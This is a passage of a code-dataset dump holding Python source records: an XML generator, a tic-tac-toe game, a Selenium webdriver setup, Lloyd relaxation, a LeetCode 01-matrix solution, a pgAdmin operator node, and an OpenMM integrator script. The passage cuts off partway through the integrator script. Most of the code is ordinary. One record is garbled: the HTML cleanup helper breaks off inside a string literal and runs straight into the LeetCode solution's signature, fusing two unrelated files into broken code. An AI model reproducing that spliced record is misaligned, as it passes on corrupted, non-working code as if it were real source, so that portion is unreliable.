+str(global_volume_strings)+ '.')\nprint('Bitcoin\\'s total percentage of global cap is ' +str(bitcoin_percentage)+ '%.')\nprint('last updated on' +str(last_updated_strings)+ '.')\n","sub_path":"coincap_global.py","file_name":"coincap_global.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"467490270","text":"#coding:utf-8\n\n'''\nCreated on 2016-1-1\n\n@author: ZWD\n@description: xml generator\n'''\n\n#导入xml模块\nimport xml.dom.minidom as Dom\nimport os\n\nclass XMLGenerator:\n #创建xml文件对象,初始化文件名\n def __init__(self, xml_name):\n self.doc = Dom.Document()\n self.xml_name = xml_name\n\n #创建节点\n def createNode(self, node_name):\n return self.doc.createElement(node_name)\n\n #添加节点\n def addNode(self, node, prev_node=None):\n cur_node = node\n if prev_node is not None:\n prev_node.appendChild(cur_node)\n else:\n self.doc.appendChild(cur_node)\n return cur_node\n\n #设置节点属性\n def setNodeAttr(self, node, att_name, value):\n cur_node = node\n cur_node.setAttribute(att_name, value)\n\n #设置节点值\n def setNodeValue(self, cur_node, value):\n node_data = self.doc.createTextNode(value)\n cur_node.appendChild(node_data)\n\n #生成xml文件\n def generateXml(self):\n myFile = open(self.xml_name, \"w\")\n myFile.write(self.doc.toprettyxml(indent=\"\\t\", newl=\"\\n\", encoding=\"utf-8\"))\n myFile.close()\n\nif __name__ == \"__main__\":\n xmlFile = 
XMLGenerator(\"config.xml\")\n\n node_config = xmlFile.createNode(\"config\")\n xmlFile.setNodeAttr(node_config, \"author\", \"ZWD\")\n xmlFile.setNodeAttr(node_config, \"date\", \"2016-1-1\")\n xmlFile.addNode(node=node_config)\n\n #node_file块开始\n node_file = xmlFile.createNode(\"file\")\n\n node_file_path = xmlFile.createNode(\"path\")\n xmlFile.setNodeValue(node_file_path,r\"d:\\file\")\n xmlFile.addNode(node_file_path, node_file)\n\n node_file_name = xmlFile.createNode(\"name\")\n xmlFile.setNodeValue(node_file_name, u\"2015-1210-1.xls\")\n xmlFile.addNode(node_file_name, node_file)\n\n xmlFile.addNode(node_file, node_config)\n #node_file块结束\n\n sheets = [('toolatr',), 'code', 'name', 'content', ('dropatr',), 'id', 'group', 'toolcode']\n temp_node = None\n for sheet in sheets:\n if type(sheet) == tuple:\n sheet_node = xmlFile.createNode(sheet[0])\n temp_node = sheet_node\n xmlFile.addNode(sheet_node, node_config)\n else:\n column_node = xmlFile.createNode(sheet)\n xmlFile.setNodeValue(column_node, '0')\n if temp_node != None:\n xmlFile.addNode(column_node, temp_node)\n else:\n print(\"没有找到表名!\")\n os._exit(1)\n\n xmlFile.generateXml()\n\n","sub_path":"XMLGenerator.py","file_name":"XMLGenerator.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"280582117","text":"\n\nclass TicTacToe:\n\n TURN_TO_SYMBOL = ('X', 'O')\n\n def __init__(self, size) -> None:\n self.size = size\n self.pieces_remaining = self.size ** 2\n self.board = [['-' for _ in range(size)] for _ in range(size)]\n self.turn = 0 ## 0 for X, 1 for O, this way is easier to toggle\n \n def __str__(self):\n return '\\n---BOARD---\\n' + '\\n'.join(\n ' | '.join(self.board[row]) for row in range(len(self.board))\n )\n \n def place_piece(self, row, col, symbol):\n if (not 0 <= row < self.size\n or not 0 <= col < self.size):\n return False \n if not symbol:\n return False\n if self.board[row][col] != '-':\n return False\n self.board[row][col] = symbol\n self.pieces_remaining -= 1\n return True\n \n def play(self, play_computer = False):\n while self.pieces_remaining > 0:\n print(self)\n if play_computer and self.turn == 1:\n self.computer_play()\n else:\n row, col = self.get_user_input()\n while not self.place_piece(row, col, self.get_current_symbol()):\n print(f'failed to place {self.get_current_symbol()} at {row}, {col}, please try again')\n row, col = self.get_user_input()\n \n if self.win_check(self.get_current_symbol()):\n print(f'player {self.turn} has won!')\n break\n self.turn ^= 1\n\n def computer_play(self):\n for row in range(len(self.board)):\n for col in range(len(self.board[0])):\n if self.board[row][col] == '-':\n print(f'\\nAI MOVES TO {row},{col}')\n self.place_piece(row, col, self.get_current_symbol())\n return\n\n\n def get_current_symbol(self):\n return TicTacToe.TURN_TO_SYMBOL[self.turn]\n\n def get_user_input(self):\n print('')\n player_input = input(f'Player {self.turn} enter position to place {self.get_current_symbol()}: ')\n [row, col] = player_input.split()\n return (int(row), int(col))\n \n def win_check(self, symbol):\n row_win = self.win_check_rows(symbol)\n col_win = self.win_check_cols(symbol)\n diagonal_win = self.win_check_diagonals(symbol)\n return any([row_win, col_win, diagonal_win])\n \n def win_check_diagonals(self, symbol):\n n = self.size\n left_to_right = [self.board[i][i] for i in range(n)]\n right_to_left = [self.board[i][-1 - i] for i in range(n)]\n return self.win_check_arrays(symbol, 
[left_to_right, right_to_left])\n \n def win_check_rows(self, symbol):\n return self.win_check_arrays(symbol, self.board)\n\n def win_check_cols(self, symbol):\n cols_to_rows = zip(*self.board)\n return self.win_check_arrays(symbol, cols_to_rows)\n \n def win_check_arrays(self, symbol, arrays):\n for array in arrays:\n win = all(x == symbol for x in array)\n if win:\n return True\n return False\n\ngame = TicTacToe(3)\ngame.play(play_computer=True)\n\ndef test_row():\n game = TicTacToe(3)\n game.place_piece(0,0,'X')\n game.place_piece(0,1,'X')\n game.place_piece(0,2,'X')\n print(game)\n print(game.win_check('X'))\n\ndef test_diag():\n game = TicTacToe(3)\n game.place_piece(0,2, 'X')\n game.place_piece(1,1, 'X')\n print(game)\n print(game.win_check('X'))\n game.place_piece(2,0, 'X')\n print(game)\n print(game.win_check('X'))\n","sub_path":"leetcode/tic_tac_toe.py","file_name":"tic_tac_toe.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"121599839","text":"import platform\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom selenium.webdriver.edge.options import Options\r\nfrom selenium.webdriver.firefox.options import Options\r\nfrom selenium.webdriver.opera.options import Options\r\nfrom webdriver_manager.chrome import ChromeDriverManager\r\nfrom webdriver_manager.firefox import GeckoDriverManager\r\nfrom webdriver_manager.microsoft import EdgeChromiumDriverManager\r\nfrom webdriver_manager.opera import OperaDriverManager\r\n\r\n\r\nclass configDriver:\r\n\r\n @staticmethod\r\n def get_webdriver(browser, config, headless_browser, page_load_strategy):\r\n \"\"\"\r\n :configDriver Returns a webdriver object of the particular browser to be executed from a STRING received as\r\n arguments during launch. 
If the headless_browser parameter has\r\n        the value 'headless' then it sends a series of parameters from the config data to\r\n        assign the browser to headless browser mode.\r\n        :param browser: main launch argument string, it indicates which browser to run.\r\n        :param config: json file read buffer\r\n        :param headless_browser: Its 'headless' value sends a series of parameters based on the\r\n        config data to assign the browser to headless browser mode.\r\n        :param page_load_strategy: page load strategy to apply ('normal', 'eager' or 'none'); 'default' leaves the browser default.\r\n        :returns: a webdriver object\r\n        \"\"\"\r\n        # Get the system name so that Windows or Linux webdrivers can be returned\r\n\r\n        if browser == 'chrome' or browser == 'default':\r\n\r\n            if headless_browser == 'headless':\r\n\r\n                user_agent = config[\"HEADLESS_ARGUMENTS\"][\"user_agent\"]\r\n                chromeoptions = webdriver.ChromeOptions()\r\n                chromeoptions.add_argument(\"--headless\")\r\n                chromeoptions.add_argument(f'user-agent={user_agent}')\r\n                # add all the arguments needed to run safely in headless browser mode\r\n                chromeoptions.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"window-size\"])\r\n                chromeoptions.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"ignore-errors:\"])\r\n                chromeoptions.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"allow-running\"])\r\n                chromeoptions.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"disable-extensions\"])\r\n                chromeoptions.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"proxy-server\"])\r\n                chromeoptions.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"proxy-bypass\"])\r\n                chromeoptions.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"maximized\"])\r\n                chromeoptions.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"disable-gpu\"])\r\n                chromeoptions.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"disable-dev\"])\r\n                chromeoptions.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"no-sandbox\"])\r\n\r\n                if page_load_strategy != \"default\":\r\n                    chromeoptions.page_load_strategy = page_load_strategy  # Options: normal, eager, none\r\n\r\n                return webdriver.Chrome(executable_path=ChromeDriverManager().install(), options=chromeoptions)\r\n            else:\r\n                return webdriver.Chrome(executable_path=ChromeDriverManager().install())\r\n\r\n        if browser == 'firefox':\r\n\r\n            if headless_browser == \"headless\":\r\n                user_agent = config[\"HEADLESS_ARGUMENTS\"][\"user_agent\"]\r\n                firefox_options = webdriver.FirefoxOptions()\r\n                firefox_options.headless = True\r\n                firefox_options.add_argument(f'user-agent={user_agent}')\r\n                firefox_options.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"window-size\"])\r\n                firefox_options.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"ignore-errors:\"])\r\n                firefox_options.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"allow-running\"])\r\n                firefox_options.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"disable-extensions\"])\r\n                firefox_options.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"proxy-server\"])\r\n                firefox_options.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"proxy-bypass\"])\r\n                firefox_options.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"maximized\"])\r\n                firefox_options.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"disable-gpu\"])\r\n                firefox_options.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"disable-dev\"])\r\n                firefox_options.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"no-sandbox\"])\r\n\r\n                if page_load_strategy != \"default\":\r\n                    firefox_options.page_load_strategy = page_load_strategy  # Options: normal, eager, none\r\n\r\n                return webdriver.Firefox(executable_path=GeckoDriverManager().install(), options=firefox_options)\r\n            else:\r\n                
return webdriver.Firefox(executable_path=GeckoDriverManager().install())\r\n\r\n        if browser == 'opera':\r\n            return webdriver.Opera(executable_path=OperaDriverManager().install())\r\n\r\n        if browser == 'edge':  # TODO: check for Windows < 8.1?\r\n            edgedriver = EdgeChromiumDriverManager()\r\n            return webdriver.Edge(edgedriver.install())\r\n\r\n    @staticmethod\r\n    def config_resolution(driver, resolucion):\r\n        \"\"\"\r\n        :config_resolution Sets the browser window size.\r\n        :param driver: webdriver instance whose window will be resized\r\n        :param resolucion: 'default' to maximize the window, or a string such as '1920x1080'\r\n        \"\"\"\r\n        if resolucion == 'default':\r\n            driver.maximize_window()\r\n        else:\r\n            ancho_alto = resolucion.split('x')\r\n            ancho, alto = ancho_alto[0], ancho_alto[1]\r\n            driver.set_window_size(ancho, alto)\r\n\r\n    @staticmethod\r\n    def loading_strategy(browser, page_load_strategy):\r\n        \"\"\"\r\n        :loading_strategy Defines the page loading strategy for the current session. By default, when\r\n        Selenium WebDriver loads a page, it follows the normal page loading strategy. It is recommended to stop\r\n        the downloading of additional resources (such as images, css, js) when the page load takes\r\n        a long time. By default, WebDriver will wait to respond to a driver.get() or driver.navigate().to() call\r\n        until the document ready state is complete.\r\n        :options 'normal'\r\n        :options 'eager'\r\n        :options 'none'\r\n        :param page_load_strategy: one of 'normal', 'eager' or 'none'\r\n        :param browser: main launch argument string\r\n        :returns: a webdriver object\r\n        \"\"\"\r\n        options = Options()\r\n\r\n        if browser == 'chrome' or browser == 'default':\r\n            return webdriver.Chrome(options=options)\r\n\r\n        if browser == 'firefox':\r\n            return webdriver.Firefox(options=options)\r\n\r\n        if browser == 'opera':\r\n            return webdriver.Opera(options=options)\r\n\r\n        if browser == 'edge':\r\n            return webdriver.Edge(options=options)\r\n","sub_path":"Part2_Automation/PythonVersion/Drivers/configDriver.py","file_name":"configDriver.py","file_ext":"py","file_size_in_byte":6810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"334618930","text":"from scipy.spatial import Voronoi\nimport numpy as np\nimport sys\n\n\nclass Field():\n\n    '''\n    Create a Voronoi map that can be used to run Lloyd relaxation on an array of 2D points.\n    For background, see: https://en.wikipedia.org/wiki/Lloyd%27s_algorithm\n    '''\n\n    def __init__(self, points=None):\n        '''\n        Store the points and bounding box of the points to which Lloyd relaxation will be applied\n        @param [arr] points: a numpy array with shape n, 2, where n is number of points\n        '''\n        if not len(points):\n            raise Exception('points should be a numpy array with shape n,2')\n\n        x = points[:, 0]\n        y = points[:, 1]\n        self.bounding_box = [min(x), max(x), min(y), max(y)]\n        self.points = points\n        self.build_voronoi()\n\n    def build_voronoi(self):\n        '''\n        Build a Voronoi map from self.points. 
For background on self.voronoi attrs, see:\n        https://docs.scipy.org/doc/scipy-0.18.1/reference/generated/scipy.spatial.Voronoi.html\n        '''\n        eps = sys.float_info.epsilon\n        self.voronoi = Voronoi(self.points, qhull_options=\"Qbb Qc Qz\")\n        self.filtered_regions = [] # list of regions with vertices inside Voronoi map\n        for region in self.voronoi.regions:\n            inside_map = True    # is this region inside the Voronoi map?\n            for index in region: # index = the idx of a vertex in the current region\n\n                # check if index is inside Voronoi map (indices == -1 are outside map)\n                if index == -1:\n                    inside_map = False\n                    break\n\n                # check if the current coordinate is in the Voronoi map's bounding box\n                else:\n                    coords = self.voronoi.vertices[index]\n                    if not (self.bounding_box[0] - eps <= coords[0] and\n                            self.bounding_box[1] + eps >= coords[0] and\n                            self.bounding_box[2] - eps <= coords[1] and\n                            self.bounding_box[3] + eps >= coords[1]):\n                        inside_map = False\n                        break\n\n            # store the region if it has vertices and is inside the Voronoi map\n            if region != [] and inside_map:\n                self.filtered_regions.append(region)\n\n\n    def find_centroid(self, vertices):\n        '''\n        Find the centroid of a Voronoi region described by `vertices`, and return a\n        np array with the x and y coords of that centroid.\n        The equation for the method used here to find the centroid of a 2D polygon\n        is given here: https://en.wikipedia.org/wiki/Centroid#Of_a_polygon\n        @params: np.array `vertices` a numpy array with shape n,2\n        @returns np.array a numpy array that defines the x, y coords\n          of the centroid described by `vertices`\n        '''\n        area = 0\n        centroid_x = 0\n        centroid_y = 0\n        for i in range(len(vertices)-1):\n            step = (vertices[i, 0] * vertices[i+1, 1]) - (vertices[i+1, 0] * vertices[i, 1])\n            area += step\n            centroid_x += (vertices[i, 0] + vertices[i+1, 0]) * step\n            centroid_y += (vertices[i, 1] + vertices[i+1, 1]) * step\n        area /= 2\n        centroid_x = (1.0/(6.0*area)) * centroid_x\n        centroid_y = (1.0/(6.0*area)) * centroid_y\n        return np.array([[centroid_x, centroid_y]])\n\n    def relax_points(self):\n        '''\n        Moves each point to the centroid of its cell in the Voronoi map to \"relax\"\n        the points (i.e. 
jitter them so as to spread them out within the space).\n '''\n centroids = []\n for region in self.filtered_regions:\n vertices = self.voronoi.vertices[region + [region[0]], :]\n centroid = self.find_centroid(vertices) # get the centroid of these verts\n centroids.append(list(centroid[0]))\n\n self.points = centroids # store the centroids as the new point positions\n self.build_voronoi() # rebuild the voronoi map given new point positions\n","sub_path":"lloyd.py","file_name":"lloyd.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"375569010","text":"import logging\nfrom xml.etree import ElementTree\nfrom bs4 import BeautifulSoup\n\nlogger = logging.getLogger(__name__)\n\n\nclass CleanupTools:\n\n @staticmethod\n def cleanup_html(nodes):\n text = \"\"\n for node in nodes:\n html = ElementTree.tostring(node, encoding='utf-8', method='xml').decode('utf-8').replace(\"\\\\r\", \"\\n\")\n soup = BeautifulSoup(html, 'html.parser')\n if html.startswith(\" List[List[int]]:\n # print(len(mat), len(mat[0]))\n for i in range(len(mat)):\n for j in range(len(mat[0])):\n if mat[i][j] == 1:\n mat[i][j] = 10 ** 5\n q = []\n for i in range(len(mat)):\n for j in range(len(mat[0])):\n if mat[i][j] == 0:\n q.append((i, j, 0))\n\n directions = [(0, -1), (-1, 0), (0, 1), (1, 0)]\n visited = [[0 for _ in range(len(mat[0]))] for __ in range(len(mat))]\n while len(q) > 0:\n x, y, depth = q[0]\n # print(x, y)\n # visited[x][y] = 1\n for step_x, step_y in directions:\n next_x = x + step_x\n next_y = y + step_y\n if 0 <= next_x < len(mat) and 0 <= next_y < len(mat[0]):\n if mat[next_x][next_y] != 0:\n mat[next_x][next_y] = min(mat[next_x][next_y], depth + 1)\n if visited[next_x][next_y] == 0:\n q.append((next_x, next_y, depth + 1))\n visited[next_x][next_y] = 1\n q = q[1:]\n return mat\n\nif __name__ == '__main__':\n sol = Solution()\n n = 10 ** 2\n m = 10 ** 2\n mat = [[1 for _ in range(m)] for __ in range(n)]\n mat[0][0] = 0\n # print(mat)\n mat = sol.updateMatrix(mat)\n print(mat)\n\n","sub_path":"source code/542. 01 Matrix.py","file_name":"542. 
01 Matrix.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"588707600","text":"##########################################################################\n#\n# pgAdmin 4 - PostgreSQL Tools\n#\n# Copyright (C) 2013 - 2023, The pgAdmin Development Team\n# This software is released under the PostgreSQL Licence\n#\n##########################################################################\n\n\"\"\" Implements Operator Node \"\"\"\n\nfrom functools import wraps\n\nfrom flask import render_template\nfrom flask_babel import gettext\n\nimport pgadmin.browser.server_groups.servers.databases as database\nfrom config import PG_DEFAULT_DRIVER\nfrom pgadmin.browser.server_groups.servers.databases.schemas.utils \\\n import SchemaChildModule\nfrom pgadmin.browser.utils import PGChildNodeView\nfrom pgadmin.utils.ajax import make_json_response, internal_server_error, \\\n make_response as ajax_response, gone\nfrom pgadmin.utils.compile_template_name import compile_template_path\nfrom pgadmin.utils.driver import get_driver\n\n\nclass OperatorModule(SchemaChildModule):\n \"\"\"\n class OperatorModule(SchemaChildModule)\n\n A module class for Operator node derived from SchemaChildModule.\n\n Methods:\n -------\n * __init__(*args, **kwargs)\n - Method is used to initialize the Operator and it's base module.\n\n * get_nodes(gid, sid, did, scid, opid)\n - Method is used to generate the browser collection node.\n\n * node_inode()\n - Method is overridden from its base class to make the node as leaf node.\n\n * script_load()\n - Load the module script for schema, when any of the server node is\n initialized.\n \"\"\"\n\n _NODE_TYPE = 'operator'\n _COLLECTION_LABEL = gettext(\"Operators\")\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Method is used to initialize the OperatorModule and it's base module.\n\n Args:\n *args:\n **kwargs:\n \"\"\"\n\n super().__init__(*args, **kwargs)\n self.min_ver = 90100\n self.max_ver = None\n\n def get_nodes(self, gid, sid, did, scid):\n \"\"\"\n Generate the collection node\n \"\"\"\n if self.has_nodes(sid, did, scid=scid,\n base_template_path=OperatorView.BASE_TEMPLATE_PATH):\n yield self.generate_browser_collection_node(scid)\n\n @property\n def script_load(self):\n \"\"\"\n Load the module script for database, when any of the database node is\n initialized.\n \"\"\"\n return database.DatabaseModule.node_type\n\n @property\n def node_inode(self):\n return False\n\n\nblueprint = OperatorModule(__name__)\n\n\nclass OperatorView(PGChildNodeView):\n \"\"\"\n This class is responsible for generating routes for Operator node\n\n Methods:\n -------\n * __init__(**kwargs)\n - Method is used to initialize the OperatorView and it's base view.\n\n * check_precondition()\n - This function will behave as a decorator which will checks\n database connection before running view, it will also attaches\n manager,conn & template_path properties to self\n\n * list()\n - This function is used to list all the Operator nodes within that\n collection.\n\n * nodes()\n - This function will used to create all the child node within that\n collection, Here it will create all the Operator node.\n\n * properties(gid, sid, did, scid, opid)\n - This function will show the properties of the selected Operator node\n\n * sql(gid, sid, did, scid):\n - This function will generate sql to show it in sql pane for the\n selected Operator node.\n \"\"\"\n\n node_type = blueprint.node_type\n node_label = 
\"Operator\"\n BASE_TEMPLATE_PATH = 'operators/sql/#{0}#'\n\n parent_ids = [\n {'type': 'int', 'id': 'gid'},\n {'type': 'int', 'id': 'sid'},\n {'type': 'int', 'id': 'did'},\n {'type': 'int', 'id': 'scid'}\n ]\n ids = [\n {'type': 'int', 'id': 'opid'}\n ]\n\n operations = dict({\n 'obj': [\n {'get': 'properties', 'delete': 'delete', 'put': 'update'},\n {'get': 'list', 'post': 'create', 'delete': 'delete'}\n ],\n 'delete': [{'delete': 'delete'}, {'delete': 'delete'}],\n 'children': [{'get': 'children'}],\n 'nodes': [{'get': 'node'}, {'get': 'nodes'}],\n 'sql': [{'get': 'sql'}]\n })\n\n def check_precondition(f):\n \"\"\"\n This function will behave as a decorator which will checks\n database connection before running view, it will also attaches\n manager,conn & template_path properties to self\n \"\"\"\n\n @wraps(f)\n def wrap(*args, **kwargs):\n # Here args[0] will hold self & kwargs will hold gid,sid,did\n self = args[0]\n self.manager = get_driver(PG_DEFAULT_DRIVER).connection_manager(\n kwargs['sid']\n )\n self.conn = self.manager.connection(did=kwargs['did'])\n self.datistemplate = False\n if (\n self.manager.db_info is not None and\n kwargs['did'] in self.manager.db_info and\n 'datistemplate' in self.manager.db_info[kwargs['did']]\n ):\n self.datistemplate = self.manager.db_info[\n kwargs['did']]['datistemplate']\n\n # Set the template path for the SQL scripts\n self.template_path = \\\n self.BASE_TEMPLATE_PATH.format(self.manager.version)\n\n return f(*args, **kwargs)\n\n return wrap\n\n @check_precondition\n def list(self, gid, sid, did, scid):\n \"\"\"\n This function is used to list all the operator nodes within that\n collection.\n\n Args:\n gid: Server group ID\n sid: Server ID\n did: Database ID\n scid: Schema ID\n\n Returns:\n JSON of available operator nodes\n \"\"\"\n\n SQL = render_template(\"/\".join([self.template_path,\n self._NODES_SQL]), scid=scid)\n status, res = self.conn.execute_dict(SQL)\n\n if not status:\n return internal_server_error(errormsg=res)\n return ajax_response(\n response=res['rows'],\n status=200\n )\n\n @check_precondition\n def nodes(self, gid, sid, did, scid):\n \"\"\"\n This function will used to create all the child node within that\n collection.\n Here it will create all the operator node.\n\n Args:\n gid: Server Group ID\n sid: Server ID\n did: Database ID\n scid: Schema ID\n\n Returns:\n JSON of available operator child nodes\n \"\"\"\n\n res = []\n SQL = render_template(\"/\".join([self.template_path,\n self._NODES_SQL]), scid=scid)\n status, rset = self.conn.execute_2darray(SQL)\n if not status:\n return internal_server_error(errormsg=rset)\n\n for row in rset['rows']:\n res.append(\n self.blueprint.generate_browser_node(\n row['oid'],\n scid,\n row['name'],\n icon=\"icon-operator\",\n description=row['description']\n ))\n\n return make_json_response(\n data=res,\n status=200\n )\n\n @check_precondition\n def node(self, gid, sid, did, scid, opid):\n \"\"\"\n This function will fetch properties of the operator node.\n\n Args:\n gid: Server Group ID\n sid: Server ID\n did: Database ID\n scid: Schema ID\n opid: Operator ID\n\n Returns:\n JSON of given operator node\n \"\"\"\n\n SQL = render_template(\"/\".join([self.template_path,\n self._NODES_SQL]), opid=opid)\n status, rset = self.conn.execute_2darray(SQL)\n if not status:\n return internal_server_error(errormsg=rset)\n\n for row in rset['rows']:\n return make_json_response(\n data=self.blueprint.generate_browser_node(\n row['oid'],\n scid,\n row['name'],\n icon=\"icon-operator\"\n ),\n 
status=200\n )\n\n return gone(self.not_found_error_msg())\n\n @check_precondition\n def properties(self, gid, sid, did, scid, opid):\n \"\"\"\n This function will show the properties of the selected operator node.\n\n Args:\n gid: Server Group ID\n sid: Server ID\n did: Database ID\n scid: Schema ID\n scid: Schema ID\n opid: Operator ID\n\n Returns:\n JSON of selected operator node\n \"\"\"\n\n status, res = self._fetch_properties(scid, opid)\n if not status:\n return res\n\n return ajax_response(\n response=res,\n status=200\n )\n\n def _fetch_properties(self, scid, opid):\n \"\"\"\n This function fetch the properties for the specified object.\n\n :param scid: Schema ID\n :param opid: Operator ID\n \"\"\"\n\n SQL = render_template(\"/\".join([self.template_path,\n self._PROPERTIES_SQL]),\n scid=scid, opid=opid,\n datlastsysoid=self._DATABASE_LAST_SYSTEM_OID)\n status, res = self.conn.execute_dict(SQL)\n\n if not status:\n return False, internal_server_error(errormsg=res)\n\n if len(res['rows']) == 0:\n return False, gone(self.not_found_error_msg())\n\n res['rows'][0]['is_sys_obj'] = (\n res['rows'][0]['oid'] <= self._DATABASE_LAST_SYSTEM_OID or\n self.datistemplate)\n\n return True, res['rows'][0]\n\n @check_precondition\n def sql(self, gid, sid, did, scid, opid):\n \"\"\"\n This function will generates reverse engineered sql for operator\n object\n\n Args:\n gid: Server Group ID\n sid: Server ID\n did: Database ID\n scid: Schema ID\n opid: Operator ID\n json_resp: True then return json response\n \"\"\"\n\n SQL = render_template(\"/\".join([self.template_path,\n self._PROPERTIES_SQL]),\n scid=scid, opid=opid)\n status, res = self.conn.execute_dict(SQL)\n if not status:\n return internal_server_error(errormsg=res)\n if len(res['rows']) == 0:\n return gone(self.not_found_error_msg())\n\n data = res['rows'][0]\n\n SQL = render_template(\"/\".join([self.template_path,\n self._CREATE_SQL]),\n data=data)\n\n sql_header = \"-- Operator: {0};\\n\\n-- \".format(data['name'])\n\n sql_header += render_template(\"/\".join([self.template_path,\n self._DELETE_SQL]),\n name=data['name'],\n oprnamespace=data['schema'],\n lefttype=data['lefttype'],\n righttype=data['righttype'],\n )\n SQL = sql_header + '\\n' + SQL.strip('\\n')\n\n return ajax_response(response=SQL)\n\n\nOperatorView.register_node_view(blueprint)\n","sub_path":"web/pgadmin/browser/server_groups/servers/databases/schemas/operators/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"294901236","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport math\n\nimport numpy as np\nimport parmed as pmd\nu = pmd.unit\n\nimport openmm as mm\nimport openmm.app as app\nfrom openmm.unit import *\nfrom openmm import *\nfrom openmm.app import *\n\nfrom argparse import ArgumentParser\nimport sys\n\ndef MTSVVVRIntegrator(temperature, collision_rate, timestep, system, ninnersteps=4):\n \"\"\"\n Create a multiple timestep velocity verlet with velocity randomization (VVVR) integrator.\n Taken from https://github.com/leeping/forcebalance, by Lee-Ping Wang\n \n ARGUMENTS\n\n temperature (Quantity compatible with kelvin) - the temperature\n collision_rate (Quantity compatible with 1/picoseconds) - the collision rate\n timestep (Quantity compatible with femtoseconds) - the integration timestep\n system (simtk.openmm.System) - system whose forces will be partitioned\n ninnersteps (int) - number of inner 
timesteps (default: 4)\n\n RETURNS\n\n integrator (openmm.CustomIntegrator) - a VVVR integrator\n\n NOTES\n \n This integrator is equivalent to a Langevin integrator in the velocity Verlet discretization with a\n timestep correction to ensure that the field-free diffusion constant is timestep invariant. The inner\n velocity Verlet discretization is transformed into a multiple timestep algorithm.\n\n REFERENCES\n\n VVVR Langevin integrator: \n * http://arxiv.org/abs/1301.3800\n * http://arxiv.org/abs/1107.2967 (to appear in PRX 2013) \n \n TODO\n\n Move initialization of 'sigma' to setting the per-particle variables.\n \n \"\"\"\n # Multiple timestep Langevin integrator.\n for i in system.getForces():\n if i.__class__.__name__ in [\"NonbondedForce\", \"CustomNonbondedForce\", \"AmoebaVdwForce\", \"AmoebaMultipoleForce\", \"MonteCarloBarostat\"]:\n # Slow force.\n print(' %s is a Slow Force' % i.__class__.__name__);\n # logger.info(i.__class__.__name__ + \" is a Slow Force\\n\")\n i.setForceGroup(1)\n else:\n # Fast force.\n print(' %s is a Fast Force' % i.__class__.__name__);\n # logger.info(i.__class__.__name__ + \" is a Fast Force\\n\")\n i.setForceGroup(0)\n\n kB = BOLTZMANN_CONSTANT_kB * AVOGADRO_CONSTANT_NA\n kT = kB * temperature\n \n integrator = CustomIntegrator(timestep)\n \n integrator.addGlobalVariable(\"dt_fast\", timestep/float(ninnersteps)) # fast inner timestep\n integrator.addGlobalVariable(\"kT\", kT) # thermal energy\n integrator.addGlobalVariable(\"a\", np.exp(-collision_rate*timestep)) # velocity mixing parameter\n integrator.addGlobalVariable(\"b\", np.sqrt((2/(collision_rate*timestep)) * np.tanh(collision_rate*timestep/2))) # timestep correction parameter\n integrator.addPerDofVariable(\"sigma\", 0) \n integrator.addPerDofVariable(\"x1\", 0) # position before application of constraints\n\n #\n # Pre-computation.\n # This only needs to be done once, but it needs to be done for each degree of freedom.\n # Could move this to initialization?\n #\n integrator.addComputePerDof(\"sigma\", \"sqrt(kT/m)\")\n\n # \n # Velocity perturbation.\n #\n integrator.addComputePerDof(\"v\", \"sqrt(a)*v + sqrt(1-a)*sigma*gaussian\")\n integrator.addConstrainVelocities();\n \n #\n # Symplectic inner multiple timestep.\n #\n integrator.addUpdateContextState(); \n integrator.addComputePerDof(\"v\", \"v + 0.5*b*dt*f1/m\")\n for innerstep in range(ninnersteps):\n # Fast inner symplectic timestep.\n integrator.addComputePerDof(\"v\", \"v + 0.5*b*dt_fast*f0/m\")\n integrator.addComputePerDof(\"x\", \"x + v*b*dt_fast\")\n integrator.addComputePerDof(\"x1\", \"x\")\n integrator.addConstrainPositions(); \n integrator.addComputePerDof(\"v\", \"v + 0.5*b*dt_fast*f0/m + (x-x1)/dt_fast\")\n integrator.addComputePerDof(\"v\", \"v + 0.5*b*dt*f1/m\") # TODO: Additional velocity constraint correction?\n integrator.addConstrainVelocities();\n\n #\n # Velocity randomization\n #\n integrator.addComputePerDof(\"v\", \"sqrt(a)*v + sqrt(1-a)*sigma*gaussian\")\n integrator.addConstrainVelocities();\n\n return integrator\n\nparser = ArgumentParser()\ngroup = parser.add_argument_group('Input File Options')\ngroup.add_argument('--xml', dest='xml', default='system.xml', metavar='FILE',\n help='''OpenMM System XML file. Default is %(default)s''')\ngroup.add_argument('-p', 